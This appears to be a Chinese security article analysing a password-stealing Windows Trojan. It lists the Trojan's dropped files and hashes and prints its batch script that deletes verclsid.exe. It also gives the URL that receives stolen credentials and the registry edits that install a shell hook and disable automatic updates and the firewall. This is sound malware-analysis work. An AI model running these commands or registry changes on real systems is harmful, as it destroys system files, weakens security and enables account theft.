【IT168 专稿】

    病毒名称： 特洛伊盗号木马
    病毒类型：盗号木马
    文件MD5： 56E146754050E7D5FFA49715DC2C2670
    公开范围：完全公开
    危害等级： 4
    文件长度：16,142 字节
    脱壳后： 282,972 字节
    感染系统： Windows98以上版本
    加壳类型：Upack 0.3.9 beta2s -> Dwing [Overlay]

    病毒描述
    首先删除微软的系统文件verclsid.exe，然后在fonts目录下释放病毒文件。rsjzbsp.exe文件为病毒主体，rsjzbpm.dll为进程注入，  保护rsjzbsp.exe文件以免被直接删除。Gejibnd.fon为加密的url地址,rsjzbfg.dll文件为明文的url地址。

    行为分析-本地行为

    1、在c盘下创建DFD490781.bat批处理文件，其作用为实现删除verclsid.exe。内容如下：
    @echo off
    :Loop 
    attrib "C:\WINDOWS\system32\verclsid.exe" -r -a -s -h
    del "C:\WINDOWS\system32\verclsid.exe"
    if exist "C:\WINDOWS\system32\verclsid.exe" goto Loop
    del %0

    2、在c:\windows\fonts下面释放gejibnd.fon、rsjzbfg.dll、rsjzbpm.dll和rsjzbsp.exe文件。

    3、取得帐户和密码后将发到下面的地址：http：//www.ads183.com/buguale/wx/post.asp

    4、修改下列注册表：
    [HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{22FAACDE-34DA-CCD4-AB4D-DA34485A3422}\InprocServer32]

    @="C:\\WINDOWS\\Fonts\\rsjzbpm.dll"

    "ThreadingModel"="Apartment"

    [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\ShellExecuteHooks]

    "{22FAACDE-34DA-CCD4-AB4D-DA34485A3422}"="rsjzbpm.dll" \\执行挂钩

    [HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU]

    "NoAutoUpdate"=dword:00000001 \\关闭自动更新

    "AUOptions"=dword:00000001

    [HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile]

    "EnableFirewall"=dword:00000000 \\关闭防火墙

    [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile]

    "EnableFirewall"=dword:00000000